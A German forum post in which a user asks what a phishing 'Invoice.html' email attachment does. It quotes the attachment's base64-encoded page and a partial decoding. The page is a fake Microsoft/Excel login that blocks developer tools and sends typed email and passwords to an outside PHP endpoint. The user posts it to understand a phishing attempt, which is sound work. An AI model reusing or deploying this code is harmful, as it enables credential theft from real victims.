Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
Was machen diese JavaScripts?
#1
Servus!

Brauche Eure Hilfe!

Heute Nacht kriegt mein Chef von einem Lieferant ein Mail mit "Invoice.html"-Anhang. Nichts Böses ahnend, versucht er den Anhang aufzumachen. Merkt aber sofort, das hier was faul ist.
Das hier ist Inhalt von "Invoice.html"
Code:
<script>
    var url_string = "firmenmail@adresse.com";
    var data = atob("PCFET0NUWVBFIGh0bWw+CjxodG1sIGRpcj0ibHRyIiBjbGFzcz0iIiBsYW5nPSJlbiI+CiAgICA8aGVhZD4KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04Ij4KICAgIDx0aXRsZT5FeGNlbCB3b3Jrc2hlZXQ8L3RpdGxlPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wLCBtYXhpbXVtLXNjYWxlPTIuMCwgdXNlci1zY2FsYWJsZT15ZXMiPgogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzMuNC4xL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgogICAgPGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9mYXZpY29uX2FfZXVwYXlmZ2docWlhaTdrOXNvbDZsZzIuaWNvIj4gICAgCiAgICA8bGluayBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2Nkbi5qc2RlbGl2ci5uZXQvbnBtL2NvcnNAMi44LjUvbGliL2luZGV4Lm1pbi5qcyI+CiAgICA8bGluayBkYXRhLWxvYWRlcj0iY2RuIiBjcm9zc29yaWdpbj0iYW5vbnltb3VzIiBocmVmPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvZXN0cy8yLjEvY29udGVudC9jZG5idW5kbGVzL2NvbnZlcmdlZC52Mi5sb2dpbi5taW5feml5dGY4ZHp0OWVnMXM2LW9oaGxlZzIuY3NzIiByZWw9InN0eWxlc2hlZXQiPgo8L2hlYWQ+CjxzY3JpcHQ+CiAgICAvLyBwcmV2ZW50IGN0cmwgKyBzCiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGFzeW5jKGUpID0+IHsKICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIChlLndoaWNoID09IDgzKSkgewogICAgICAgICAgICBlLnByZXZlbnREZWZhdWx0KCk7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsgfQogICAgfSk7CiAgICB3aW5kb3cuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBldmVudCA9PiBldmVudC5wcmV2ZW50RGVmYXVsdCgpKTsKICAgIGRvY3VtZW50Lm9ua2V5ZG93biA9IGZ1bmN0aW9uIChlKSB7CiAgICAgICAgaWYgKGV2ZW50LmtleUNvZGUgPT0gMTIzKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0UnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUuc2hpZnRLZXkgJiYgZS5rZXlDb2RlID09ICdJJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLnNoaWZ0S2V5ICYmIGUua2V5Q29kZSA9PSAnSicuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdVJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ1MnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnSCcuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgICAgIGlmIChlLmN0cmxLZXkgJiYgZS5rZXlDb2RlID09ICdBJy5jaGFyQ29kZUF0KDApKSB7CiAgICAgICAgICAgIHJldHVybiBmYWxzZTsKICAgICAgICB9CiAgICAgICAgaWYgKGUuY3RybEtleSAmJiBlLmtleUNvZGUgPT0gJ0YnLmNoYXJDb2RlQXQoMCkpIHsKICAgICAgICAgICAgcmV0dXJuIGZhbHNlOwogICAgICAgIH0KICAgICAgICBpZiAoZS5jdHJsS2V5ICYmIGUua2V5Q29kZSA9PSAnRScuY2hhckNvZGVBdCgwKSkgewogICAgICAgICAgICByZXR1cm4gZmFsc2U7CiAgICAgICAgfQogICAgfQogICAgd2luZG93Lm9ua2V5ZG93biA9IChlKSA9PiB7CiAgICAgICAgcmV0dXJuICEoZS5jdHJsS2V5ICYmCiAgICAgICAgICAgIChlLmtleUNvZGUgPT09IDY3IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg2IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDg1IHx8CiAgICAgICAgICAgICAgICBlLmtleUNvZGUgPT09IDExNykpOwogICAgfTsgICAgCjwvc2NyaXB0Pgo8Ym9keSBjbGFzcz0iY2IiIHN0eWxlPSJkaXNwbGF5OiBibG9jazsiPgo8Zm9ybSBuYW1lPSJmMSIgaWQ9ImkwMjgxIiBtZXRob2Q9InBvc3QiIGF1dG9jb21wbGV0ZT0ib2ZmIj4KICAgIDxkaXYgY2xhc3M9ImxvZ2luLXBhZ2luYXRlZC1wYWdlIj4KICAgICAgICA8ZGl2IGlkPSJsaWdodGJveFRlbXBsYXRlQ29udGFpbmVyIj4KPGRpdiBpZD0ibGlnaHRib3hCYWNrZ3JvdW5kQ29udGFpbmVyIj4KICAgIDxkaXYgY2xhc3M9ImJhY2tncm91bmQtaW1hZ2UtaG9sZGVyIiByb2xlPSJwcmVzZW50YXRpb24iPgogICAgPGRpdiBjbGFzcz0iYmFja2dyb3VuZC1pbWFnZSBleHQtYmFja2dyb3VuZC1pbWFnZSIgc3R5bGU9ImJhY2tncm91bmQtaW1hZ2U6IHVybCgmcXVvdDtodHRwczovL2d5YXpvLmNvbS9lMjFlY2NmOWUzMDdlMzYwZTNhODBjZTZiYmM3NGFmOC5wZ247KTsiPjwvZGl2Pgo8L2Rpdj48L2Rpdj4KICAgIDxkaXYgY2xhc3M9Im91dGVyIiBpZD0iYmdJbWdDZW50ZXIiPgogICAgICAgIDxkaXYgY2xhc3M9InRlbXBsYXRlLXNlY3Rpb24gbWFpbi1zZWN0aW9uIj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWlkZGxlIGV4dC1taWRkbGUiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0iZnVsbC1oZWlnaHQiPgogICAgPGRpdiBjbGFzcz0iZmxleC1jb2x1bW4iPgogICAgICAgIDxkaXYgY2xhc3M9Indpbi1zY3JvbGwiPgogICAgICAgICAgICA8ZGl2IGlkPSJsaWdodGJveCIgY2xhc3M9InNpZ24taW4tYm94IGV4dC1zaWduLWluLWJveCBmYWRlLWluLWxpZ2h0Ym94Ij4KICAgICAgICAgICAgPGRpdj48aW1nIHNyYz0iaHR0cHM6Ly9pLmd5YXpvLmNvbS83YWU3NzNmZjYxZTJjOGE4OGJkYTU1MzBjM2IyYWExMy5wbmciIHN0eWxlPSJ3aWR0aDo5MHB4OyBoZWlnaHQ6NzVweDsiPjwvZGl2PgogICAgICAgICAgICA8ZGl2IHJvbGU9Im1haW4iPgogICAgICAgIDxkaXYgaWQ9InBzdGIiIGNsYXNzPSJwYWdpbmF0aW9uLXZpZXcgYW5pbWF0ZSBoYXMtaWRlbnRpdHktYmFubmVyIHNsaWRlLWluLW5leHQiPgogICAgICAgIDxkaXY+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImlkZW50aXR5QmFubmVyIj4KICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0iYnV0dG9uIiBjbGFzcz0iYmFja0J1dHRvbiIgaWQ9ImlkQnRuX0JhY2siPiA8aW1nIHJvbGU9InByZXNlbnRhdGlvbiIgcG5nc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0XzdjYzA5NmRhNmFhMmRiYTNmODFmY2MxYzgyNjIxNTdjLnBuZyIgc3Znc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyIgc3JjPSJodHRwczovL2FhZGNkbi5tc2Z0YXV0aC5uZXQvc2hhcmVkLzEuMC9jb250ZW50L2ltYWdlcy9hcnJvd19sZWZ0X2E5Y2MyODI0ZWYzNTE3YjZjNDE2MGRjZjhmZjdkNDEwLnN2ZyI+IDwvYnV0dG9uPgogICAgICAgICAgICAgICAgPGRpdiBpZD0ic2hvdy1lbWFpbCIgY2xhc3M9ImlkZW50aXR5Ij48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICA8ZGl2IGlkPSJsb2dpbkhlYWRlciIgY2xhc3M9InJvdyB0aXRsZSBleHQtdGl0bGUiPgogICAgICAgIDxkaXYgcm9sZT0iaGVhZGluZyIgYXJpYS1sZXZlbD0iMSI+RW50ZXIgcGFzc3dvcmQ8L2Rpdj4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iZXJyb3JwdyIgc3R5bGU9ImNvbG9yOiByZWQ7IG1hcmdpbjogMTVweDsgbWFyZ2luLWxlZnQ6IDBweDsgbWFyZ2luLXRvcDogMHB4OyBtYXJnaW4tYm90dG9tOiAwcHg7Ij48L2Rpdj4KICAgIDxkaXYgaWQ9ImltcG9ydGFudDEiIHN0eWxlPSJjb2xvcjogYmxhY2s7Zm9udC1zaXplOiAxM3B4OyI+CiAgICAgICAgQmVjYXVzZSB5b3UncmUgYWNjZXNzaW5nIHNlbnNpdGl2ZSBpbmZvLCB5b3UgbmVlZCB0byB2ZXJpZnkgeW91ciBwYXNzd29yZCB0byB2aWV3IGV4Y2VsIHdvcmtzaGVldHMKICAgICA8L2Rpdj4KICAgIDxkaXYgY2xhc3M9InJvdyI+CiAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCBjb2wtbWQtMjQiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJwbGFjZWhvbGRlckNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8aW5wdXQgbmFtZT0icGFzc3dkIiB0eXBlPSJwYXNzd29yZCIgaWQ9ImkwMTE4IiBhdXRvY29tcGxldGU9Im9mZiIgY2xhc3M9ImZvcm0tY29udHJvbCBpbnB1dCBleHQtaW5wdXQgdGV4dC1ib3ggZXh0LXRleHQtYm94IiBwbGFjZWhvbGRlcj0iUGFzc3dvcmQiIHJlcXVpcmVkIC8+CiAgICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8ZGl2PgogICAgPGRpdiBjbGFzcz0icG9zaXRpb24tYnV0dG9ucyI+CiAgICAgICAgPGRpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0icm93Ij4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbC1tZC0yNCI+CiAgICAgICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0idGV4dC0xMyI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImZvcm0tZ3JvdXAiPgogICAgICAgICAgICAgICAgICAgICAgICAgICAgPGEgaWQ9ImlkQV9QV0RfRm9yZ290UGFzc3dvcmQiIHJvbGU9ImxpbmsiIGhyZWY9IiMiPk5vdGU6IE9ubHkgcmVjaXBpZW50J3MgZW1haWwgY2FuIGFjY2VzcyBzaGFyZWQgZmlsZXM8L2E+CiAgICAgICAgICAgICAgICAgICAgICAgIDwvZGl2PgogICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICA8L2Rpdj4KICAgICAgICAgICAgPGRpdiBjbGFzcz0iZm9ybS1ncm91cCI+CiAgICAgICAgICAgICAgICA8YSBpZD0iaTE2NjgiIGhyZWY9IiMiPjwvYT4KICAgICAgICAgICAgPC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAKICAgICAgICA8ZGl2IGNsYXNzPSJ3aW4tYnV0dG9uLXBpbi1ib3R0b20iPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJyb3ciPgogICAgICAgICAgICAgICAgPGRpdj48ZGl2IGNsYXNzPSJjb2wteHMtMjQgbm8tcGFkZGluZy1sZWZ0LXJpZ2h0IGJ1dHRvbi1jb250YWluZXIiPgogICAgICAgIDxkaXYgY2xhc3M9ImlubGluZS1ibG9jayI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJzdWJtaXQiIGlkPSJCdXR0b245IiBjbGFzcz0id2luLWJ1dHRvbiBidXR0b25fcHJpbWFyeSBidXR0b24gZXh0LWJ1dHRvbiBwcmltYXJ5IGV4dC1wcmltYXJ5IiB2YWx1ZT0iU2lnbmluIj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgIDwvZGl2PjwvZGl2PgogICAgICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDwvZGl2PgogICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj48L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0icGxhdGUgZm9vdGVyIGV4dC1mb290ZXIiIHJvbGU9ImNvbnRlbnRpbmZvIj48L2Rpdj4KICAgIDxkaXYgaWQ9ImZvb3RlciIgcm9sZT0iY29udGVudGluZm8iIGNsYXNzPSJmb290ZXIgZXh0LWZvb3RlciI+CiAgICAgICAgPGRpdj4KPGRpdiBpZD0iZm9vdGVyTGlua3MiIGNsYXNzPSJmb290ZXJOb2RlIHRleHQtc2Vjb25kYXJ5Ij4KICAgICAgICA8YSBpZD0iZnRyVGVybXMiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5UZXJtcyBvZiB1c2U8L2E+CiAgICAgICAgPGEgaWQ9ImZ0clByaXZhY3kiIGhyZWY9IiMiIGNsYXNzPSJmb290ZXItY29udGVudCBleHQtZm9vdGVyLWNvbnRlbnQgZm9vdGVyLWl0ZW0gZXh0LWZvb3Rlci1pdGVtIj5Qcml2YWN5ICZhbXA7IGNvb2tpZXM8L2E+CiAgICA8YSBpZD0ibW9yZU9wdGlvbnMiIGhyZWY9IiMiIGFyaWEtbGFiZWw9IkNsaWNrIGhlcmUgZm9yIHRyb3VibGVzaG9vdGluZyBpbmZvcm1hdGlvbiIgY2xhc3M9ImZvb3Rlci1jb250ZW50IGV4dC1mb290ZXItY29udGVudCBmb290ZXItaXRlbSBleHQtZm9vdGVyLWl0ZW0gZGVidWctaXRlbSBleHQtZGVidWctaXRlbSI+Li4uPC9hPgo8L2Rpdj48L2Rpdj4KICAgIDwvZGl2Pgo8L2Rpdj4KPC9kaXY+PC9kaXY+CjwvZm9ybT4KPHNjcmlwdD4KICAgIHZhciBjb3VudCA9IDA7CiAgICBmdW5jdGlvbiBzZXRfYnJhbmQoZW1haWwpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIGRhdGE6IHsgdXNlcm5hbWU6IGVtYWlsIH0sCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChyZXNwb25zZSkgewogICAgICAgICAgICAgICAgbGV0IHJlcyA9IEpTT04ucGFyc2UocmVzcG9uc2UpCiAgICAgICAgICAgICAgICBsZXQgbG9nbyA9IHJlc1sicmVzIl1bIkJhbm5lckxvZ28iXSwgYmFja2dyb3VuZCA9IHJlc1sicmVzIl1bIklsbHVzdHJhdGlvbiJdLCBEYXJrVGlsZSA9IHJlc1sicmVzIl1bIlRpbGVEYXJrTG9nbyJdCiAgICAgICAgICAgICAgICBsZXQgVGlsZUxvZ28gPSByZXNbInJlcyJdWyJUaWxlTG9nbyJdLCBCb2lsZXJQbGF0ZVRleHQgPSByZXNbInJlcyJdWyJCb2lsZXJQbGF0ZVRleHQiXQogICAgICAgICAgICAgICAgaWYgKGxvZ28pIHsKICAgICAgICAgICAgICAgICAgICAkKCcubG9nbycpLmF0dHIoJ3NyYycsIGxvZ28pOwoJCQkgICAgfQogICAgICAgICAgICAgICAgaWYgKEJvaWxlclBsYXRlVGV4dCkgewogICAgICAgICAgICAgICAgICAgIGNvbnNvbGUubG9nKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuYXBwZW5kKEJvaWxlclBsYXRlVGV4dCk7CiAgICAgICAgICAgICAgICAgICAgJCgiLnBsYXRlIikuY3NzKHsidGV4dC1hbGlnbiI6ICJjZW50ZXIifSkKICAgICAgICAgICAgICAgIH0gICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgIGlmIChiYWNrZ3JvdW5kKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIGJhY2tncm91bmQgKyAnKScsICItd2Via2l0LWZpbHRlciI6ICJicmlnaHRuZXNzKDIwJSkiLCAiZmlsdGVyIjogImJyaWdodG5lc3MoNDclKSIgfSk7CiAgICAgICAgICAgICAgICB9IGVsc2UgaWYgKERhcmtUaWxlKSB7CiAgICAgICAgICAgICAgICAgICAgJCgnLmJhY2tncm91bmQtaW1hZ2UnKS5jc3MoeyAnYmFja2dyb3VuZC1pbWFnZSc6ICd1cmwoJyArIERhcmtUaWxlICsgJyknLCAiLXdlYmtpdC1maWx0ZXIiOiAiYnJpZ2h0bmVzcygyMCUpIiwgImZpbHRlciI6ICJicmlnaHRuZXNzKDQ3JSkiIH0pOwogICAgICAgICAgICAgICAgfSBlbHNlIGlmIChUaWxlTG9nbykgewogICAgICAgICAgICAgICAgICAgICQoJy5iYWNrZ3JvdW5kLWltYWdlJykuY3NzKHsgJ2JhY2tncm91bmQtaW1hZ2UnOiAndXJsKCcgKyBUaWxlTG9nbyArICcpJywgIi13ZWJraXQtZmlsdGVyIjogImJyaWdodG5lc3MoMjAlKSIsICJmaWx0ZXIiOiAiYnJpZ2h0bmVzcyg0NyUpIiB9KTsKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfQoKICAgIGZ1bmN0aW9uIHNlbmRfcmVzdWx0KHVzZXIsIHBhc3MpIHsKICAgICAgICAkLmFqYXgoewogICAgICAgICAgICB1cmw6ICdodHRwczovL2Jhc2NvbS5wbC93cC1jb250ZW50L3RoZW1lcy92YW50YWdlL3RlbXBsYXRlcy96YWtpL3BpaS5waHAnLAogICAgICAgICAgICBkYXRhOiB7CiAgICAgICAgICAgICAgICAiZW1haWwiOiB1c2VyLAogICAgICAgICAgICAgICAgInBhc3N3b3JkIjogcGFzcwogICAgICAgICAgICB9LAogICAgICAgICAgICB0eXBlOiAiUE9TVCIsCiAgICAgICAgICAgIHN1Y2Nlc3M6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZyhkYXRhKTsKICAgICAgICAgICAgfSwKICAgICAgICAgICAgZXJyb3I6IGZ1bmN0aW9uIChkYXRhKSB7CiAgICAgICAgICAgICAgICBjb25zb2xlLmxvZygnQWpheCBlcnJvcicpOwogICAgICAgICAgICB9CgkJfSk7ICAgICAgICAKICAgIH0KCiAgICAKICAgIGRvY3VtZW50LmFkZEV2ZW50TGlzdGVuZXIoJ0RPTUNvbnRlbnRMb2FkZWQnLCBhc3luYygpID0+IHsKICAgICAgICBpZih1cmxfc3RyaW5nKXsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInNob3ctZW1haWwiKS5pbm5lckhUTUwgPSB1cmxfc3RyaW5nOwogICAgICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAxMTgiKS5mb2N1cygpOwogICAgICAgICAgICBzZXRfYnJhbmQodXJsX3N0cmluZyk7CiAgICAgICAgfQoKICAgICAgICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiQnV0dG9uOSIpLmFkZEV2ZW50TGlzdGVuZXIoImNsaWNrIiwgZSA9PiB7CiAgICAgICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0ID8gZXZlbnQucHJldmVudERlZmF1bHQoKSA6IGV2ZW50LnJldHVyblZhbHVlID0gZmFsc2U7CgogICAgICAgICAgICB2YXIgcHN3ZCA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDExOCIpLnZhbHVlOwogICAgICAgICAgICBpZihwc3dkLmxlbmd0aCA8IDUpewogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5PSJub25lIjsKICAgICAgICAgICAgICAgIHNldFRpbWVvdXQoKCkgPT4ge2RvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpMDI4MSIpLnJlc2V0KCk7IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdlcnJvcnB3JykuaW5uZXJIVE1MID0gIllvdXIgYWNjb3VudCBwYXNzd29yZCBpcyB0b28gc2hvcnQuIn0sIDE1MDApOwogICAgICAgICAgICB9IGVsc2UgaWYgKHBzd2QubGVuZ3RoID4gNSAmJiBjb3VudCA8PSAwKSB7CiAgICAgICAgICAgICAgICBzZW5kX3Jlc3VsdCh1cmxfc3RyaW5nLCBwc3dkKTsKICAgICAgICAgICAgICAgIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJpbXBvcnRhbnQxIikuc3R5bGUuZGlzcGxheT0ibm9uZSI7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHtjb3VudCsrOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaTAyODEiKS5yZXNldCgpOyBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnZXJyb3JwdycpLmlubmVySFRNTCA9IGBZb3VyIHBhc3N3b3JkIGlzIGluY29ycmVjdC4gUGxlYXNlIGVudGVyIHRoZSBwYXNzd29yZCBmb3IgeW91ciBhYm92ZSBlbWFpbCB0byBhY2Nlc3MgRXhjZWwgd29ya3NoZWV0LCA8YSBocmVmPSIjIj48L2E+YH0sIDIwMDApCiAgICAgICAgICAgIH0gZWxzZSBpZiAoY291bnQgPCAyKXsKICAgICAgICAgICAgICAgIHNlbmRfcmVzdWx0KHVybF9zdHJpbmcsIHBzd2QpOwogICAgICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImltcG9ydGFudDEiKS5zdHlsZS5kaXNwbGF5ID0gIm5vbmUiOwogICAgICAgICAgICAgICAgc2V0VGltZW91dCgoKSA9PiB7Y291bnQrKzsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImkwMjgxIikucmVzZXQoKTsgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2Vycm9ycHcnKS5pbm5lckhUTUwgPSBgWW91ciBwYXNzd29yZCBpcyBpbmNvcnJlY3QuIFBsZWFzZSBlbnRlciB0aGUgcGFzc3dvcmQgZm9yIHlvdXIgYWJvdmUgZW1haWwgdG8gYWNjZXNzIEV4Y2VsIHdvcmtzaGVldCwgPGEgaHJlZj0iIyI+PC9hPmB9LCAyMDAwKQogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgc2VuZF9yZXN1bHQodXJsX3N0cmluZywgcHN3ZCk7CiAgICAgICAgICAgICAgICBzZXRUaW1lb3V0KCgpID0+IHt3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly9vdXRsb29rLm9mZmljZTM2NS5jb20vRW5jcnlwdGlvbi9FcnJvclBhZ2UuYXNweD9zcmM9MyZjb2RlPTExJmJlPVNONlBSMDRNQjQwMTQmZmU9Sk5BUDI3NUNBMDA0MC5aQUZQMjc1LlBST0QuT1VUTE9PZ0suQ09NJmxvYz1lbi1VUyZpdGVtSUQ9RTRFX01fZTlkZjE1NGEtZTRiOC00NDg2LThhZWMtN2FjY2VlYjkzZmVlIil9KTsKICAgICAgICAgICAgfQogICAgICAgIH0pOwogICAgfSk7Cjwvc2NyaXB0Pgo8L2Rpdj48L2JvZHk+PC9odG1sPg==");
    document.write(data)
</script>

Konnte soweit den Inhalt dekodieren...
Code:
<!DOCTYPE html>
<html dir="ltr" class="" lang="en">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Excel worksheet</title>
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
    <link rel="shortcut icon" href="https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">
    <link crossorigin="anonymous" href="https://cdn.jsdelivr.net/npm/cors@2.8.5/lib/index.min.js">
    <link data-loader="cdn" crossorigin="anonymous" href="https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_ziytf8dzt9eg1s6-ohhleg2.css" rel="stylesheet">
</head>
<script>
    // prevent ctrl + s
    window.addEventListener('keydown', async(e) => {
        if (e.ctrlKey && (e.which == 83)) {
            e.preventDefault();
            return false; }
    });
    window.addEventListener('contextmenu', event => event.preventDefault());
    document.onkeydown = function (e) {
        if (event.keyCode == 123) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'I'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.shiftKey && e.keyCode == 'J'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'U'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'S'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'H'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'A'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'F'.charCodeAt(0)) {
            return false;
        }
        if (e.ctrlKey && e.keyCode == 'E'.charCodeAt(0)) {
            return false;
        }
    }
    window.onkeydown = (e) => {
        return !(e.ctrlKey &&
            (e.keyCode === 67 ||
                e.keyCode === 86 ||
                e.keyCode === 85 ||
                e.keyCode === 117));
    };
</script>
<body class="cb" style="display: block;">
<form name="f1" id="i0281" method="post" autocomplete="off">
    <div class="login-paginated-page">
        <div id="lightboxTemplateContainer">
<div id="lightboxBackgroundContainer">
    <div class="background-image-holder" role="presentation">
    <div class="background-image ext-background-image" style="background-image: url(&quot;https://gyazo.com/e21eccf9e307e360e3a80ce6bbc74af8.pgn;);"></div>
</div></div>
    <div class="outer" id="bgImgCenter">
        <div class="template-section main-section">
            <div class="middle ext-middle">
                <div class="full-height">
    <div class="flex-column">
        <div class="win-scroll">
            <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox">
            <div><img src="https://i.gyazo.com/7ae773ff61e2c8a88bda5530c3b2aa13.png" style="width:90px; height:75px;"></div>
            <div role="main">
        <div id="pstb" class="pagination-view animate has-identity-banner slide-in-next">
        <div>
            <div class="identityBanner">
